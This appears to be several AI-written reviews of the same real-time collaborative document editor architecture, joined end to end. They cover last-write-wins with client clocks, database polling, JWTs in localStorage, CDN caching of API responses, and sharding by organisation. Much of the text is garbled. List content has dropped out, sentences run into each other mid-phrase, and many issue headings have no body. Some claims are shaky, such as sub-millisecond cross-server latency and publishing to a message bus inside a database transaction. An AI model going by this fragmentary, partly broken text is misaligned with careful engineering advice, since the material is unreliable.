This architecture contains several critical flaws that will lead to data loss, poor user experience, and system instability at scale. The "Last-write-wins" strategy combined with client-side timestamps is particularly dangerous for collaborative editing.
Here is a detailed breakdown of failure modes, race conditions, and bottlenecks, organized by domain, with specific solutions and trade-offs.
T. User B (clock slow by 5s) types at T. User A's change appears to have a later timestamp and overwrites User B's change, even though B typed later.last_write_time + latency_buffer.SELECT queries.localStorage. They steal the JWT and impersonate the user for 24 hours.Cache-Control: no-store for all document content API endpoints.Document_ID (hashed) rather than Organization_ID.| Priority | Component | Problem | Immediate Fix |
|---|---|---|---|
| P0 (Critical) | Sync Strategy | Client Timestamps + LWW | Switch to Server Timestamps + CRDT/OT |
| P0 (Critical) | Real-Time | Polling Postgres every 2s | Implement Redis Pub/Sub |
| P0 (Critical) | Security | JWT in LocalStorage | Move to HttpOnly Cookies |
| P1 (High) | CDN | Caching API responses | Disable caching for document endpoints |
| P1 (High) | DB | Read Replicas Lag | Route "read-after-write" to Primary |
| P2 (Medium) | Storage | Full HTML Snapshots | Switch to Ops Log + Periodic Checkpoints |
This revision moves the system from a fragile, polling-based architecture to an event-driven, consistency-guaranteed model suitable for real-time collaboration.
This architecture contains several critical design flaws that would lead to data loss, high latency, security vulnerabilities, and poor scalability. Below is a detailed breakdown of the failure modes, race conditions, and bottlenecks, along with specific solutions and trade-offs.
/api/*). Only cache static assets (JS, CSS, Images). Use Cache-Control: no-store for dynamic document data.| Component | Current State | Recommended State | Reason |
|---|---|---|---|
| Sync Logic | LWW + Client Clocks | CRDT / OT + Server Seq IDs | Prevents data loss on concurrent edits. |
| Inter-Server | Polling DB (2s) | Redis Pub/Sub | Reduces DB load; improves latency to <100ms. |
| DB Writes | Immediate PG Write | Buffer / Event Log | Prevents DB I/O saturation. |
| Storage | HTML Snapshots | Operation Logs + Snapshots | Enables history/undo and efficient merging. |
| Auth | LocalStorage JWT | HttpOnly Cookies + Refresh | Prevents XSS token theft; allows revocation. |
| CDN | Caches API | Cache Static Only | Prevents stale document data. |
| LB | Round-Robin | Sticky Sessions / Gateway | Maintains WebSocket connection state. |
If you deploy the architecture exactly as described:
Recommendation: Prioritize fixing the Sync Strategy (CRDT/OT) and the Inter-Server Communication (Redis Pub/Sub) immediately, as these directly impact the core value proposition of the product.
This architecture contains several critical flaws that would lead to data loss, poor user experience, and security vulnerabilities in a production environment. Below is a detailed breakdown of the failure modes, race conditions, and bottlenecks, along with proposed solutions and their trade-offs.
Issue: Inefficient Cross-Server Communication (Polling)
Issue: Last-Write-Wins (LWW) with Client Clocks
Issue: WebSocket Connection State
Issue: Database Write Bottleneck (Keystroke-to-DB)
Issue: Full HTML Snapshots (30s Interval)
Issue: Read Replicas Consistency
Issue: CDN Caching API Responses
POST, PUT, PATCH, and specific GET endpoints for active documents). Only cache static assets (JS/CSS).Issue: Round-Robin LB with WebSockets
Upgrade: websocket header) and enforce stickiness.Issue: 24-Hour JWT Expiry
Issue: LocalStorage for Tokens
Issue: Organization ID Partitioning (Hotspots)
Issue: Document Locking
| Component | Current Design | Critical Risk | Recommended Fix |
|---|---|---|---|
| Sync | Poll DB every 2s | 2s Latency | Redis Pub/Sub for server-to-server msg |
| Conflict | LWW + Client Clock | Data Loss | CRDTs (Yjs) + Vector Clocks |
| DB Write | On every keystroke | DB Overload | Batch writes / Buffer in Redis |
| CDN | Cache API 5 min | Stale Data | No Cache for API endpoints |
| Auth | 24h JWT + LocalStorage | XSS / Hijack | 15m Access Token + HttpOnly Refresh Cookie |
| LB | Round Robin | WS Disconnection | Sticky Sessions / Layer 7 LB |
| Storage | HTML Snapshots | Bloated / Data Loss | Operation Log + Periodic Snapshot |
To build a system that scales like Google Docs, you must move away from "Database-First" synchronization to "Event-First" synchronization. The database should be the source of truth for persistence, not the bus for real-time communication. The real-time bus should be in-memory (Redis/Memcached) with asynchronous persistence to Postgres.
This architecture contains several critical flaws that would prevent it from functioning as a usable real-time collaborative editor. While it resembles a standard CRUD application, real-time collaboration requires specific handling of concurrency, state, and latency that this design violates.
Here is the breakdown of failure modes, race conditions, and bottlenecks, categorized by domain.
insert at index 5, delete 3 chars) rather than state snapshots. Apply operations sequentially.Cache-Control: no-store for document API endpoints.localStorage and steal the JWT. The attacker can then impersonate the user for 24 hours.SameSite cookies mitigate most of this). Requires backend to handle cookie parsing instead of header parsing.This architecture contains several significant architectural flaws that would result in data loss, user frustration, and severe scaling limitations. While it mimics a general backend structure, it lacks the specific patterns required for collaborative editing.
Here is a detailed analysis of failure modes, race conditions, and bottlenecks, paired with specific solutions and trade-offs.
Failure Mode: Clock Skew & LWW Failure
timestamp will not guarantee total ordering without a unique transaction ID.vector clock or sequence number to every change event.Failure Mode: 2-Second Polling Latency
doc:123:changes). All Node.js API servers subscribe to this channel. When a new server gets the message, it pushes it to the client's WebSocket connection.Failure Mode: Load Balancer Session Affinity Failure
socket.io or ws proxy) that handles WebSocket routing. Implement Sticky Sessions (Session Affinity) on the LB (e.g., X-Real-IP based or cookie-based) so the LB routes a specific client IP to the same Node ID. Alternatively, use a Pub/Sub Backend (Redis) for WebSocket messages, decoupling the Node processes entirely.Failure Mode: 30-Second Snapshot Interval
Failure Mode: CDN Caching API Responses
GET /document/{id} or POST /document/{id}/save are dynamic. Caching these for 5 minutes means every user sees the same stale version of the document for 5 minutes.Cache-Control: no-store on all API endpoints.localStorage to HttpOnly cookies (to mitigate XSS).max-age for the JWT (e.g., 5 minutes) with a refresh token mechanism.Failure Mode: Single DB Write Bottleneck
Organization ID (as planned) is good. Additionally, implement Database Connection Pooling and Asynchronous Writes (Batching).| Issue | Risk Level | Priority | Recommended Fix |
|---|---|---|---|
| Conflict Resolution (LWW/HTML) | High | 1 | Switch to CRDTs (e.g., Yjs) and store JSON text chunks. |
| Sync Latency (2s Polling) | High | 1 | Redis Pub/Sub for cross-server message propagation. |
| LB/WS Compatibility | Medium | 2 | Sticky Sessions or WebSocket Gateway to maintain connection state. |
| CDN Caching API | High | 2 | Disable caching (no-store) for all API endpoints. |
| Auth (Local Storage) | Medium | 3 | Move to HttpOnly Cookies + Refresh Tokens. |
| Data Loss (30s Snapshots) | Low | 3 | Reduce interval to 10s; Use Client-side Buffering for immediate sync. |
Final Verdict: The proposed architecture is suitable for a simple "notes app" but not for a collaborative editor like Google Docs. The reliance on LWW + Client Clocks + HTML Snapshots creates a system that will inevitably lose work when two users collaborate. The architecture must be re-architected to use CRDT/OT logic, Redis Pub/Sub, and proper DB sharding to function acceptably.
This architecture is a common "MVP" design, but it contains several critical flaws that would prevent it from functioning as a true real-time collaborative editor (like Google Docs) under load. The most severe issues relate to data integrity (sync strategy) and real-time consistency (network topology).
Here is a detailed breakdown of the failure modes, race conditions, and bottlenecks, with specific solutions and trade-offs.
Cache-Control: no-cache, must-revalidate for document endpoints. Alternatively, use ETags and validate against the server on every request.(OrgID + UserID) or use a dynamic sharding key. Implement a "hot shard" detection mechanism to move documents to less loaded shards.Set-Cookie with HttpOnly, Secure, and SameSite=Strict flags. Do not rely on LocalStorage for auth tokens.| Component | Current Design | Recommended Design | Primary Benefit |
|---|---|---|---|
| Sync Logic | Client Timestamps (LWW) | CRDTs / OT with Server Clocks | Prevents data loss and race conditions. |
| Real-Time | Polling DB (2s) | Redis Pub/Sub between servers | Sub-millisecond latency across servers. |
| Load Balancer | Round-Robin | Sticky Sessions or Redis State | Maintains WebSocket connection affinity. |
| Persistence | Snapshot every 30s | Batched Writes (Redis -> Postgres) | Reduces DB load; near-zero data loss. |
| CDN | Caches API (5m) | No-Cache for Doc Endpoints | Ensures users see latest edits immediately. |
| Auth | LocalStorage JWT | HttpOnly Cookies | Prevents XSS token theft. |
The current architecture is suitable for a single-user document editor or a read-only CMS, but it will fail for a collaborative editor. The combination of Client Timestamps and Polling makes true collaboration impossible, and the CDN Caching contradicts the real-time requirement.
To make this viable, you must decouple the real-time protocol from the persistence layer and implement a proven consensus algorithm (OT/CRDT) for conflict resolution.
This architecture contains several critical flaws that would prevent it from functioning as a reliable real-time collaborative editor. While the component choices (React, Node, Postgres, Redis) are standard, the integration patterns and synchronization strategies are fundamentally broken for this use case.
Here is a detailed analysis of the failure modes, race conditions, and bottlenecks, along with specific solutions.
insert char 'a' at index 5). The server (or a dedicated sync service) transforms these operations against concurrent operations to ensure convergence.doc:{id}:updates). All other API servers subscribe to this channel and instantly broadcast the update to their local WebSocket clients.Cache-Control: no-store or private for all dynamic API endpoints serving document content. Use the CDN only for the initial application shell.HttpOnly, Secure, SameSite=Strict cookie. The browser sends it automatically; JavaScript cannot access it.SameSite handles most cases). Requires the API and Frontend to share a domain or handle cross-origin cookie policies carefully.DocumentID (hashed) or use a managed cloud database that handles auto-scaling storage/compute independently of logical tenancy. Use Row-Level Security (RLS) in Postgres for data isolation rather than physical partitioning.| Component | Current Flawed Approach | Recommended Robust Approach |
|---|---|---|
| Sync Logic | Last-Write-Wins (Client Time) | CRDTs or Operational Transformation (OT) |
| Inter-Server Sync | Poll DB every 2s | Redis Pub/Sub for instant broadcast |
| DB Writes | Write every keystroke | Write-Behind Batching (Memory/Redis -> DB) |
| Storage Format | Full HTML Snapshots | Operation Log (Event Sourcing) |
| Caching | Cache API (5 min) | No Cache for dynamic data; CDN for static assets only |
| Auth Storage | LocalStorage | HttpOnly Cookies |
| Load Balancing | Round-Robin | Sticky Sessions for WebSockets |
| Scaling Unit | Partition by Org ID | Partition by Doc ID or Managed Cloud DB |
The current architecture will result in data loss, visible lag, and security vulnerabilities under any realistic load. The shift from "snapshot-based LWW" to "operation-based CRDT/OT" with "Redis-backed pub/sub" is the most critical pivot required to make this system viable.
Below is a structured breakdown of all flaws in the architecture, categorized by type, with specific, actionable solutions and their inherent tradeoffs:
| Issue Description | Solution | Tradeoffs |
|---|---|---|
| Client clock skew breaks LWW conflict resolution: Raw client wall clocks can be minutes/hours off, leading to stale changes overwriting newer ones, or offline edits being permanently discarded when a client reconnects. | Replace client timestamps with Hybrid Logical Clocks (HLC), which combine physical time with distributed logical counters to enforce a causal order of edits even with clock skew. For offline support, layer in CRDTs (Conflict-Free Replicated Data Types) to merge edits regardless of arrival order. | HLC adds tiny metadata overhead per edit. CRDTs add frontend/backend state management complexity and marginally higher bandwidth usage, but eliminate data loss from conflicts. |
| Write-write races in Postgres: Two API servers receiving concurrent edits for the same document may interleave writes, causing the newer edit to be overwritten by a stale one, even with correct timestamps. | Implement optimistic concurrency control (OCC) in Postgres: add a version number column to documents that increments on every write. A write only succeeds if the server’s local version matches the database’s current version; failed writes trigger a retry with the latest state. | OCC avoids locking overhead but can lead to rare retries under extreme contention for a single popular document. |
| Stale initial client state: A user may fetch a document snapshot via HTTP, then have edits occur between that fetch and their WebSocket connection becoming active, leaving them permanently out of sync. | On WebSocket handshake, the server sends the document’s current version number. The client compares this to the snapshot’s version; if mismatched, it pulls all intermediate edits to catch up before applying new local changes. | Adds minor lookup overhead for new connections, but eliminates split-brain client state. |
| Issue Description | Solution | Tradeoffs |
|---|---|---|
| Cross-server sync latency + polling waste: The current 2-second Postgres polling by all API servers creates multi-second lag for users on different servers, and generates unsustainable read load as you scale API servers. | Add a lightweight Redis Pub/Sub broker for inter-server communication: when a server processes an edit, it writes to Postgres then publishes the edit to a channel for that document. All API servers subscribe to relevant document channels and broadcast edits to their local clients instantly. | Adds a new dependency that requires high availability. Redis Pub/Sub offers at-most-once delivery, so Postgres remains the source of truth for clients that miss transient messages. |
| 30-second snapshot window causes data loss: If an API server crashes between snapshot saves, all edits from that 30-second window are permanently lost. Idle documents also waste write throughput on unnecessary snapshots. | Append all edits to a persistent Redis write-ahead log (WAL) immediately before broadcasting. Only write full Postgres snapshots when a document is edited, or every 5 minutes (whichever comes first), and purge WAL entries once merged into a snapshot. | Adds small per-edit write overhead to Redis, but reduces the data loss window to <1s and eliminates wasted writes for idle documents. Requires WAL TTLs to avoid unbounded Redis growth. |
| JWTs in localStorage are vulnerable to XSS theft: Storing 24-hour JWTs in localStorage exposes them to theft via cross-site scripting, enabling full account takeover. JWTs also cannot be revoked early if a user logs out or their account is compromised. | Replace client-side JWTs with server-side sessions: store a cryptographically secure session ID in an HttpOnly, Secure, SameSite cookie (inaccessible to JS). Add short-lived access tokens (15-minute TTL) and a Redis blocklist for revoked tokens to enable early revocation. | Adds CSRF protection requirements (easily mitigated with standard CSRF tokens) and minor Redis lookup overhead per request, but eliminates XSS-based session theft. |
| CDN caches dynamic mutable data: Caching all API responses for 5 minutes leads to stale document content for all users, as edits are not reflected until the cache expires. | Disable caching for all dynamic API routes (add Cache-Control: no-store headers). Only cache static React assets (JS bundles, images) on CloudFront, with build-time content hashes to avoid serving stale frontend code after deployments. | Loses caching benefits for dynamic data, which is irrelevant for frequently changing user-specific content. Hashed static assets still retain all CDN performance benefits. |
| API server crashes drop all connected clients: A failing API server takes all its active WebSocket connections with it, leading to dropped edits and disconnected users. | Add client-side exponential backoff reconnection logic, and sticky sessions on the load balancer to keep users connected to a stable server for the duration of their session. Persist all in-flight edits to the shared Redis WAL so they are not lost if a server crashes mid-processing. | Sticky sessions can cause minor load imbalance, mitigated by assigning new connections only to servers under their per-instance connection limit (e.g., 10,000 concurrent WebSockets). |
| Issue Description | Solution | Tradeoffs |
|---|---|---|
| Org-only document partitioning creates hot shards: Partitioning only by organization ID leads to overloaded database shards for large enterprises with thousands of active documents, or viral global documents edited by 100k+ concurrent users. | Add a secondary partitioning layer: split large organizations’ documents across multiple shards by document ID. Track hot shards automatically and rebalance them across cluster nodes to spread load. For ultra-popular documents, shard edit broadcast streams across multiple Redis instances. | Adds complexity to the data routing layer, which must track document locations across shards. Rebalancing adds minor operational overhead, but eliminates single-shard overload. |
| Unlimited WebSocket connections overwhelm API servers: Without connection limits, a small number of API servers can end up with hundreds of thousands of concurrent WebSockets, leading to slow broadcast times and dropped connections. | Enforce per-instance connection limits, and implement auto-scaling for API servers that spins up new instances when the average connection count across the fleet crosses 70% of the per-instance limit. Add scale-down cooldowns to avoid thrashing during temporary load spikes. | Auto-scaling can lead to minor over-provisioning during transient spikes, but ensures no server is overwhelmed. |
| Single-point-of-failure Redis cache: A standalone Redis instance for sessions can crash, taking all active user sessions with it, and cannot scale to millions of concurrent users. | Run Redis in cluster mode with replication and AOF persistence to avoid data loss. Shard sessions and WAL data across multiple Redis nodes to spread load. | Adds operational overhead to manage a Redis cluster, but eliminates the single point of failure and scales to millions of users. |
| Postgres read load from polling grows linearly with API servers: Even with read replicas, 500 queries per second from 1000 API servers polling every 2s overwhelms replica capacity. | The same Redis Pub/Sub solution used to fix cross-server latency eliminates 99% of Postgres polling load. Only clients that reconnect or miss messages need to query Postgres for missed edits, reducing read load to a small fraction of its prior level. | The only tradeoff is the operational overhead of managing the Redis Pub/Sub layer, which is far lower than scaling Postgres replicas to support polling. |
| Failure / Race Condition | Why it happens in the current design | Concrete mitigation (trade‑offs) |
|---|---|---|
JWT stored in localStorage – vulnerable to XSS, copy‑and‑paste attacks, and malicious extensions. | No HTTP‑Only flag, no SameSite/Lax cookie protection. | Move JWT to an HttpOnly, SameSite‑Lax cookie (or use a secure “session‑store” backed by Redis). <br>Pros: eliminates client‑side token theft. <br>Cons: requires cross‑origin cookie handling, possible CORS headaches, and a small added latency for cookie‑based auth. |
| 24‑hour token expiry – stale tokens can be reused after logout or revocation. | Long‑lived access token, no refresh‑token flow. | Introduce short‑lived access tokens (≤ 5 min) + refresh‑token endpoint that issues new JWTs. Store refresh tokens in Redis with revocation list. <br>Pros: immediate revocation possible, tighter security. <br>Cons: extra round‑trip for each user activity, higher auth‑server load. |
| Session cache in Redis – single point of failure, possible data loss on crash. | No persistence configured; if Redis restarts, sessions disappear. | Enable Redis persistence (RDB + AOF) and run a Redis cluster with synchronous replication. Optionally keep a lightweight “session‑store” in PostgreSQL for critical sessions. <br>Pros: durability, fail‑over. <br>Cons: write latency + storage cost; need to manage TTL consistency across nodes. |
| Token revocation not propagated – a server that crashes may still have a revoked token in memory. | Revocation list is in‑memory only; no broadcast mechanism. | Publish revocation events to a durable pub/sub (e.g., Kafka/Redis Streams) that all API nodes consume before each request. <br>Pros: guarantees revocation is respected across all servers. <br>Cons: adds latency to auth checks, extra infra. |
| WebSocket handshake lacks auth verification – a malicious client could open a connection with a stolen token. | JWT is only sent after connection, not validated on handshake. | Validate JWT on the WebSocket upgrade request (e.g., Sec-WebSocket-Protocol or a query param) and reject if invalid or revoked. <br>Pros: prevents unauthorized connections early. <br>Cons: adds extra CPU on each upgrade, must handle token revocation in the same flow. |
| Failure / Race Condition | Why it happens | Mitigation (trade‑offs) |
|---|---|---|
| Round‑robin load balancer without sticky sessions – a client may reconnect to a different API server after a network hiccup and miss recent changes. | Load balancer distributes WebSocket connections arbitrarily. | Enable sticky (session‑affinity) at the L4/L7 layer (e.g., source‑IP, cookie‑based). Or use a shared broadcast bus (Redis Pub/Sub, NATS, Kafka) that any server can publish to and all servers can subscribe, eliminating the need for stickiness. <br>Pros (sticky): simple, no extra infra. <br>Cons (sticky): uneven load, hot‑spot servers. <br>Pros (shared bus): true cross‑server sync, easier scaling. <br>Cons: added latency, need to guarantee delivery (persistent queue). |
| Polling every 2 s from each server – high DB load, poll‑storms, and possible missed updates if a poll interval overlaps a write. | Each server runs a separate poll, leading to N × poll‑frequency DB queries. | Replace polling with PostgreSQL LISTEN/NOTIFY (or logical replication) that pushes changes to a single channel. Or use a dedicated change‑stream service (Kafka, Pulsar) that all servers subscribe to. <br>Pros: eliminates polling overhead, near‑real‑time. <br>Cons: LISTEN/NOTIFY is limited to a single DB node; need a broker for multi‑region. |
| Broadcast only to clients on the same server – other servers never see changes, causing split‑brain. | Broadcast is local to the server that wrote the change. | Centralized pub/sub (Redis, Kafka) that all API servers publish to and all servers subscribe to. Include a document‑ID + change‑ID in each message to guarantee ordering. <br>Pros: full visibility across the cluster. <br>Cons: requires a reliable message broker, adds a hop latency. |
| Duplicate broadcast when a server recovers – after a crash, the same change may be re‑broadcast. | No deduplication on server side. | Assign a monotonically increasing per‑document sequence number (or UUID) on the DB write; broadcast only if the sequence number is newer than the last seen by the server. Use a persistent broadcast log (e.g., a “change‑queue” table) that the server reads on startup to catch missed messages. <br>Pros: eliminates duplicate messages. <br>Cons: extra write on each change, need to purge logs. |
| Last‑write‑wins based on client timestamps – clock skew leads to lost updates and non‑deterministic ordering. | Relying on client clocks for conflict resolution. | Server‑provided version vectors (e.g., doc_version, row_version incremented atomically) or CRDT/OT libraries (Yjs, Automerge). Use a conflict‑resolution service that merges operations deterministically. <br>Pros: robust, no lost edits. <br>Cons: higher CPU per change (OT/CRDT merge), added state to store. |
| Broadcast failure → client never receives change – server may crash after DB commit but before publishing. | Broadcast is done after DB write, not inside a transaction. | **Publish to the message bus inside the same DB transaction (or use a 2‑phase commit pattern). Alternatively, persist broadcast events in a “outbox” table and have a background worker replay missed messages. <br>Pros: guarantee delivery. <br>Cons: transaction latency, extra writes, complexity. |
| Client sends duplicate changes – network retransmission or reconnection may cause the same edit to be applied twice. | No change‑ID deduplication on client side. | Client includes a unique change_id (UUID) and a client_seq number; server checks for duplicates before persisting. <br>Pros: prevents double‑apply. <br>Cons: requires extra memory on server to store recent IDs. |
| WebSocket reconnection storm – many clients reconnect simultaneously after a brief outage, overwhelming servers. | No exponential back‑off or rate limiting on reconnection. | Exponential back‑off with jitter on client side; circuit‑breaker on server side (e.g., limit new connections per second). <br>Pros: smooths load spikes. <br>Cons: may delay recovery for some users. |
| Failure / Race Condition | Why it happens | Mitigation (trade‑offs) |
|---|---|---|
| Concurrent edits to the same paragraph – last‑write‑wins discards earlier edits. | No per‑paragraph version tracking, just whole‑doc timestamps. | Implement per‑paragraph vector clocks (or use a CRDT for the paragraph). When a change arrives, compare its vector with the stored version; merge if possible, otherwise apply deterministic rule (e.g., “first wins”). <br>Pros: preserves edits, no data loss. <br>Cons: increased write latency, extra storage for vector clocks. |
| Write‑ahead log (WAL) replication lag – read replicas may serve stale content, leading to “ghost” edits. | Read replicas are used for read‑heavy operations; they lag behind primary. | Route read‑after‑write operations to the primary (or a “read‑after‑write” pool). Use session‑affinity for reads of a document that was just edited. <br>Pros: strong consistency for the most recent change. <br>Cons: higher load on primary, need to balance read‑only traffic. |
| Snapshot generation (full HTML every 30 s) race with real‑time edits – a snapshot may capture a partially applied change set, causing inconsistency. | Snapshot runs independently of change stream. | Take snapshots after a batch of changes is flushed to the outbox or after a stable document version is published. Use a “snapshot lock” (row‑level lock) to prevent new edits while snapshot is taken, or use incremental diffs (store only changes). <br>Pros: atomic snapshot, less storage. <br>Cons: lock contention or extra CPU for diff generation. |
| Document partitioning only by org ID – a large org may concentrate all traffic on one DB node, causing hot‑spots. | Partitioning key is coarse; all docs for the same org share the same shard. | Add a second shard key (e.g., org_id + doc_id or a hash of doc_id) and use consistent hashing for routing. <br>Pros: distributes load more evenly. <br>Cons: more complex routing logic, need to keep mapping in cache. |
| Read‑replica lag causing “lost edit” on client – client reads from replica, then sees its own edit as missing. | Client reads from replica immediately after sending change. | Prefer the primary for reads of the same document within a short window (e.g., 2 s). Or publish a “read‑after‑write” flag in the change message that tells the client to wait for broadcast before re‑reading. <br>Pros: avoids stale reads. <br>Cons: may increase latency for reads; needs extra coordination. |
| Snapshot storage overflow – full HTML snapshots can become huge, exhausting disk. | No compression, no retention policy. | Compress snapshots (gzip/ brotli) and store them in a separate object‑store (S3, GCS). Keep only N recent snapshots (e.g., last 5 minutes) and purge older ones. <br>Pros: reduces storage cost, still provides point‑in‑time recovery. <br>Cons: extra CPU for compression, need to manage lifecycle. |
| Version history not persisted – undo/redo impossible; audit logs missing. | Only current snapshot stored. | Create a doc_changes table that records each operation (type, content, user, timestamp, vector clock). Use this for undo/redo, audit, and conflict resolution. <br>Pros: richer history, easier debugging. <br>Cons: extra write load, storage growth. |
| Bottleneck | Why it occurs | Mitigation (trade‑offs) |
|---|---|---|
| WebSocket connections per API server – memory/CPU grows linearly with active users; a single server can saturate. | Each server holds its own ws connections; no shared broker for cross‑server broadcast. | Offload real‑time messaging to a dedicated message broker (Redis Pub/Sub, NATS JetStream, Kafka). API servers only publish/subscribe, reducing per‑server memory. <br>Pros: horizontal scaling of WS servers independent of message broker. <br>Cons: added hop latency, need to guarantee delivery. |
| DB write volume – every keystroke results in a row insert (or update) → high contention on the same document row. | No batching, no debounce. | Debounce client edits on the server (e.g., coalesce changes per document for ≤ 200 ms) before persisting. Use optimistic concurrency (UPDATE … WHERE version = X). <br>Pros: reduces write traffic, less lock contention. <br>Cons: introduces slight client‑side latency, need to handle “late” client messages. |
| Polling load – N × 2 s queries per server. | Polling is naive. | LISTEN/NOTIFY (or change‑stream) pushes changes only when they happen. <br>Pros: near‑zero polling load. <br>Cons: requires a single DB node to push notifications; for multi‑region you need a broker. |
| Redis session cache – single‑node bottleneck, potential OOM under massive concurrent connections. | No clustering or persistence. | Run Redis as a cluster with sharding (or use a managed service with auto‑scaling). Enable AOF for durability. <br>Pros: horizontal scaling, resilience. <br>Cons: added network hops, need to keep keys consistent across shards. |
| CDN caching of API responses – 5‑minute cache can serve stale content (e.g., auth, document metadata). | Cache‑Control headers set to public for dynamic endpoints. | Set Cache‑Control: no‑store or private for all auth and document‑state endpoints. For static assets (e.g., UI bundles) keep the 5‑min cache. <br>Pros: eliminates stale data. <br>Cons: increases CDN load, slightly higher latency for unchanged responses. |
| Load‑balancer health‑checks for WebSocket – L7 health checks may close idle connections, causing unexpected reconnects. | Health‑checks use HTTP GET, not WS ping. | Configure L4 TCP health checks or add a dedicated /health endpoint that sends a WebSocket ping and expects a pong. <br>Pros: keeps connections alive. <br>Cons: more complex LB config. |
| Hot‑spotting on a single organization – if one org has many docs, all traffic lands on the same DB shard. | Partitioning only by org ID. | Hybrid sharding: first by org, then by a hash of doc ID (or use a consistent‑hash ring). <br>Pros: spreads load across shards. <br>Cons: requires a lookup table for routing. |
| Read‑replica lag under heavy writes – read traffic may see stale data. | Reads routed to replicas. | Read‑after‑write routing: for a given document, the first read after a write goes to primary; subsequent reads can use replicas. Use a “read‑after‑write” flag in the change message. <br>Pros: improves consistency without sacrificing read scalability. <br>Cons: primary load spikes, need to track per‑doc read‑after‑write windows. |
| Server‑side broadcast storm – many servers broadcast the same change, causing duplicate messages. | No deduplication across servers. | Publish to a single, durable channel (e.g., Kafka topic per document). Each server consumes the topic; duplicates are filtered by change ID. <br>Pros: eliminates cross‑server duplication. <br>Cons: adds broker dependency and latency. |
| Snapshot generation CPU intensive – compressing large HTML on every 30 s interval. | No throttling, no async processing. | Run snapshot generation in a background worker pool (e.g., separate Node/Go service) that picks up pending snapshots from a queue. <br>Pros: isolates heavy work from request path. <br>Cons: added queue latency, need to guarantee ordering. |
| WebSocket reconnection storms – all clients reconnect at once after a brief outage, overwhelming the server. | No exponential back‑off, no rate limiting. | Exponential back‑off + jitter on client side; circuit‑breaker on server side (e.g., reject new connections above a threshold, queue them). <br>Pros: protects server, smooths load. <br>Cons: may delay reconnection for some users. |
| Issue | Why it matters | Mitigation (trade‑offs) |
|---|---|---|
| No end‑to‑end latency monitoring – you cannot detect when a change takes > X ms to reach all clients. | Real‑time editing requires tight latency (< 200 ms). | Instrument every change path: DB write → broadcast → client receipt. Export metrics to Prometheus/Grafana (histogram of change‑latency). <br>Pros: early detection of bottlenecks. <br>Cons: extra instrumentation code, need to aggregate across servers. |
| Missing health‑checks for WebSocket – LB may think a server is healthy while it cannot accept new WS connections. | LB health‑checks use HTTP only. | Add a WS ping endpoint (/ws/health) that returns pong; configure LB to probe it. <br>Pros: accurate health detection. <br>Cons: extra endpoint, potential false positives if ping latency spikes. |
| No dead‑letter queue for broadcast failures – messages that cannot be delivered are dropped silently. | A crashed client or network glitch may cause loss of edits. | Persist broadcast events in an “outbox” table and have a background worker retry. When a client finally connects, it can request missed changes. <br>Pros: guarantees no edit is lost. <br>Cons: extra DB writes, storage for outbox. |
| No automated rollback for snapshot failures – if snapshot generation crashes, the system may lose recent state. | Snapshot is used for point‑in‑time recovery. | Implement a retry loop with exponential back‑off and a fallback to the latest DB row if snapshot fails. Log the failure and alert ops. <br>Pros: ensures continuity. <br>Cons: added retry latency, need to handle partial snapshots. |
| Lack of distributed tracing – you cannot see which component (client → API → WS → DB) is slow. | Complex asynchronous flow makes debugging hard. | Add OpenTelemetry tracing on each hop (client SDK, API middleware, WS server, DB driver). Correlate change_id across services. <br>Pros: pinpoint latency spikes. <br>Cons: overhead on every request, need to propagate trace context across async boundaries. |
| No automated scaling thresholds – you may add servers manually when load spikes. | Manual scaling leads to outages. | Set autoscaling rules based on WebSocket connection count, DB write latency, Redis memory usage, and CPU. Use Kubernetes HPA or cloud‑native autoscaling groups. <br>Pros: reacts quickly to load. <br>Cons: may over‑scale during transient spikes; need cost‑aware policies. |
| No graceful degradation for CDN failures – if CloudFront edge nodes are down, static assets may be unavailable. | CDN is critical for UI bundles. | Serve static assets from a secondary origin (e.g., S3) with fallback; configure CloudFront to use origin‑failover. <br>Pros: ensures asset availability. <br>Cons: added origin load, possible duplicate content. |
| Failure / Race Condition | Why it occurs | Mitigation (trade‑offs) |
|---|---|---|
| JWT in localStorage – XSS can steal tokens. | No HttpOnly flag, token accessible via JS. | Move JWT to HttpOnly cookie (or use a secure “session‑store” in Redis). Add SameSite‑Lax to mitigate CSRF. <br>Pros: mitigates XSS token theft. <br>Cons: need to handle CORS, cookie size limits. |
| Token revocation not immediate – cached tokens in CDN or client may be used after revocation. | CDN caches auth responses (Cache‑Control: public). | Set Cache‑Control: no‑store or private for all auth‑related endpoints. Invalidate CDN cache on revocation (purge API). <br>Pros: guarantees revocation visibility. <br>Cons: higher CDN load, need purge API latency. |
| No rate limiting on WebSocket – a malicious actor can open millions of connections. | No per‑IP or per‑user limits. | Implement per‑IP connection caps (e.g., 10 connections/IP) and a global token‑bucket for messages per second. Use a WAF rule to block abnormal traffic. <br>Pros: prevents DoS. <br>Cons: may block legitimate high‑traffic users, adds complexity to connection handling. |
| No TLS‑termination hardening – CloudFront may terminate TLS at edge, exposing raw data to CDN. | Edge TLS termination is fine, but you must ensure no HTTP‑only fallback and strict HSTS. | Enable HSTS, TLS‑1.3, OCSP stapling, and strict transport security on the origin. <br>Pros: stronger encryption. <br>Cons: adds CPU overhead on CloudFront, must keep certificates up‑to‑date. |
| No audit trail for document edits – GDPR/Compliance requires ability to prove who edited what. | Only snapshots stored, no per‑edit logs. | Store each edit in doc_changes table with user ID, timestamp, IP, and operation type. Enable immutable logs (append‑only) and periodic export for compliance. <br>Pros: full audit. <br>Cons: larger DB footprint, need to purge after retention period. |
| No token revocation list in Redis – revoked tokens may still be used after a server restart. | Revocation list is in‑memory only. | Persist revocation list to a durable store (e.g., PostgreSQL table) and replicate to Redis on startup. <br>Pros: revocation survives restarts. <br>Cons: extra DB writes, possible race if list is stale. |
doc_current) and an append‑only doc_changes table for each operation. Snapshots become compressed binary blobs stored in an object store (S3) and retained only for a limited period (e.g., 10 min).org_id + doc_id using consistent hashing; optionally add a secondary key (shard_id) to spread load.change → DB → broadcast → client; expose latency histograms; set up autoscaling based on connection count, DB write latency, and Redis memory.| Change | Benefit | Cost / Drawback |
|---|---|---|
| Sticky sessions | Simple to implement; no cross‑server broadcast needed. | Uneven load, hot‑spot servers, harder to scale horizontally. |
| Shared pub/sub (Redis/Kafka) | True cross‑server broadcast, eliminates duplicate work, easier scaling. | Added latency, need for durable broker, operational overhead. |
| Short‑lived JWT + refresh | Immediate revocation, mitigates token theft. | Extra round‑trip per user, higher auth‑server load. |
| CRDT/OT | No lost edits, deterministic merge. | Higher CPU per change, extra state (vector clocks) stored. |
| Debounce client edits | Reduces DB write volume, less contention. | Small client‑side latency (e.g., 200 ms). |
